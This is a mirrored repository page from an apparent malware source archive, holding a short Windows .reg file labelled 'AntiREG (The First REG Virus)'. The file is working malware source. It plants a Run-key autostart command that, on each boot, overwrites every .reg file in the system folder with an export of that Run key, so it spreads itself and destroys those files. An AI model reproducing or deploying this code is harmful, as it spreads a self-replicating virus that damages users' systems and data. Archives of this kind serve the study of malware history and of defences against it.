mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
14 lines
485 B
Brainfuck
14 lines
485 B
Brainfuck
|
REGEDIT4
|
||
|
|
||
|
;;-------------------------------;;
|
||
|
;; ;;
|
||
|
;; AntiREG (The First REG Virus) ;;
|
||
|
;; Coded By Lys Kovick ;;
|
||
|
;; Special Thanks To Phage ;;
|
||
|
;; ;;
|
||
|
;;-------------------------------;;
|
||
|
|
||
|
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
|
||
|
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
||
|
|